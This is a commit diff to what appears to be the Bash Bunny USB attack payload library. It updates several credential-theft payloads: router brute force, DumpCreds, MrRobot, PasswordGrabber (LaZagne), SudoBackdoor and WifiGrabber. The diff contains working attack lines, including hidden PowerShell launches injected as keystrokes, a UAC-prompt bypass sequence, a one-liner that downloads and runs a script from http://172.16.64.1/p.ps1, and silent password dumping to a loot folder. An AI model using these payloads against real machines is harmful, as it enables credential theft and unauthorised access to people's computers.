Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors

payloads/library/credentials/BruteBunny/payload.txt

@@ -5,15 +5,14 @@
 # Version:       1.0
 # Category:      Password Recovery
 # Target:        Windows XP SP3+
-# 
+#
 # Description:   Will attempt to bruteforce common router username/password combinations in an attempt to gain
 #                access to the admin panel.
 
 # init
-LED R B
+LED SETUP
 
-# need SWITCH_POSITION, so give it to me. please. thank you.
-source bunny_helpers.sh
+GET SWITCH_POSITION
 
 # set up the things to make it do stuff
 mkdir -p /root/udisk/BruteBunny/loot
@@ -28,12 +27,12 @@ sync;sleep 1;sync
 ATTACKMODE HID STORAGE
 
 # wait for storage
-LED R G B 100
+LED STAGE1
 QUACK DELAY 6000
 QUACK GUI r
 QUACK DELAY 100
 # unleash the brute bunny
-LED B 100
+LED STAGE2
 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
 QUACK ENTER
 sleep 10
@@ -41,4 +40,4 @@ sleep 10
 # sync the stuff
 sync;sleep 1;sync
 
-LED G
+LED FINISH

payloads/library/credentials/DumpCreds/payload.txt

@@ -6,23 +6,23 @@
 # Build: 		 1004
 # Category:      Exfiltration
 # Target:        Windows Windows 10 (Powershell)
-# Attackmodes:   HID, Ethernet 
+# Attackmodes:   HID, Ethernet
 # !!! works only with Bash Bunny FW 1.1 and up !!!
-# 
-# 
-# LED                      Status                                       
-# ----------------------- + -------------------------------------------- 
-# SETUP                   + Setup                                        
+#
+#
+# LED                      Status
+# ----------------------- + --------------------------------------------
+# SETUP                   + Setup
 # FAIL                    + No /tools/impacket/examples/smbserver.py found
-# FAIL2                   + Target did not acquire IP address            
-# Yellow single blink     + Initialization                               
-# Yellow double blink     + HID Stage                                    
-# Yellow triple blink     + Wait for IP coming up                        
-# Cyan inv single blink   + Wait for Handshake (SMBServer Coming up)     
-# Cyan inv quint blink    + Powershell scripts running                   
-# White fast blink        + Cleanup, copy Files to <root>/loot           
-# Green              	  + Finished                                     
-# ----------------------- + -------------------------------------------- 
+# FAIL2                   + Target did not acquire IP address
+# Yellow single blink     + Initialization
+# Yellow double blink     + HID Stage
+# Yellow triple blink     + Wait for IP coming up
+# Cyan inv single blink   + Wait for Handshake (SMBServer Coming up)
+# Cyan inv quint blink    + Powershell scripts running
+# White fast blink        + Cleanup, copy Files to <root>/loot
+# Green              	  + Finished
+# ----------------------- + --------------------------------------------
 
 logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
 
@@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
 ###### Lets Start ####
 LED SETUP
 
+GET SWITCH_POSITION
 
 # Some Variables
 SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
 if [ -f $SWITCHDIR/DEBUG ];then
 	DEBUG=1   # 1= Debug on / 0= Debug off
 	tail -f /var/log/syslog > /tmp/log.txt &
-else	
+else
 	DEBUG=0
 fi
 
-mkdir -p $LOOTDIR 
+mkdir -p $LOOTDIR
 
-REQUIRETOOL impacket 
+REQUIRETOOL impacket
 
 # remove old Handshake Files
 rm -f $SWITCHDIR/CON_*
@@ -60,8 +61,8 @@ Q DELAY 5000
 
 # Launch initial cmd
 if [ $DEBUG -eq 1 ]; then
-	RUN WIN cmd 
-else 
+	RUN WIN cmd
+else
 	RUN WIN cmd /k mode con lines=1 cols=100
 fi
 
@@ -69,7 +70,7 @@ fi
 Q DELAY 1000
 if [ $DEBUG -eq 1 ]; then
 	Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
-else 
+else
 	Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
 fi
 Q DELAY 500
@@ -77,12 +78,12 @@ Q ENTER
 
 
 # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o  (OK) and ALT c (cancel)
- 
-# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
-# now the second powershell command goes to the admin cmd windows. 
 
-# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. 
-# the second powershell command goes to the cmd Windows I open first. 
+# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
+# now the second powershell command goes to the admin cmd windows.
+
+# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
+# the second powershell command goes to the cmd Windows I open first.
 Q DELAY 1000
 Q ALT j
 Q DELAY 500
@@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
 # Ethernet Tage
 LED STAGE3
 ATTACKMODE RNDIS_ETHERNET
-# Source bunny_helpers.sh to get environment variables
 
 logger -t DumpCred_2.1 "### Start SMBServer ###"
 # Start SMB Server
@@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
 if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
 	mkdir -p /root/udisk/loot/DumpCred_2.1
 fi
-mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 
+mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
 rmdir $LOOTDIR
 rm -f $SWITCHDIR/CON_EOF
 
@@ -163,4 +163,4 @@ fi
 
 ATTACKMODE RNDIS_ETHERNET STORAGE
 sync; sleep 1; sync
-LED FINISH
+LED FINISH

payloads/library/credentials/MrRobot/payload.txt

@@ -14,7 +14,10 @@
 # Cyan inverted double blink..Starts server to gets results
 # Green..............Got Creds and copied to loot folder
 # Red................No Creds
+
 LED SETUP
+GET SWITCH_POSITION
+
 # Creating Loot Folders
 LOOTDIR=/root/udisk/loot/MrRobot
 mkdir -p $LOOTDIR
@@ -34,7 +37,7 @@ Q DELAY 500
 Q ENTER
 Q DELAY 1500
 
-LED STAGE2 
+LED STAGE2
 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
 Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
 Q DELAY 300

payloads/library/credentials/PasswordGrabber/e.cmd

@@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file
 REM Time and Date is also added
 setlocal
 cd /d %~dp0
-%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
+%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
 REM These lines if you just want Passwords and no files.
 set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

payloads/library/credentials/PasswordGrabber/payload.txt

@@ -6,12 +6,13 @@
 # Target:        Windows XP SP3+
 # Props:         Diggster, IMcPwn
 # Category:      Exfiltration
-# 
+#
 # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn executes e.cmd invisibly using i.vbs
 # which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
 #
-
+LED SETUP
+GET SWITCH_POSITION
 LED ATTACK
 ATTACKMODE HID STORAGE
 RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

payloads/library/credentials/SudoBackdoor/cleaner/payload.txt

@@ -24,8 +24,6 @@ else
     ATTACKMODE ECM_ETHERNET HID
 fi
 
-DUCKY_LANG us
-
 GET SWITCH_POSITION
 GET HOST_IP
 

payloads/library/credentials/SudoBackdoor/injector/payload.txt

@@ -26,8 +26,6 @@ else
     ATTACKMODE ECM_ETHERNET HID
 fi
 
-DUCKY_LANG us
-
 GET SWITCH_POSITION
 GET HOST_IP
 

payloads/library/credentials/WifiGrabber/payload.txt

@@ -22,17 +22,15 @@
 
 ATTACKMODE HID STORAGE
 
-LED R B 200
+LED SETUP
 
-LANGUAGE=‘us’
-
-source bunny_helpers.sh
+GET SWITCH_POSITION
 
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
         QUACK ${SWITCH_POSITION}/ducky_script.txt
-        LED G
+        LED FINISH
 else
-    LED R
+    LED FAIL
     echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
         exit 1
 fi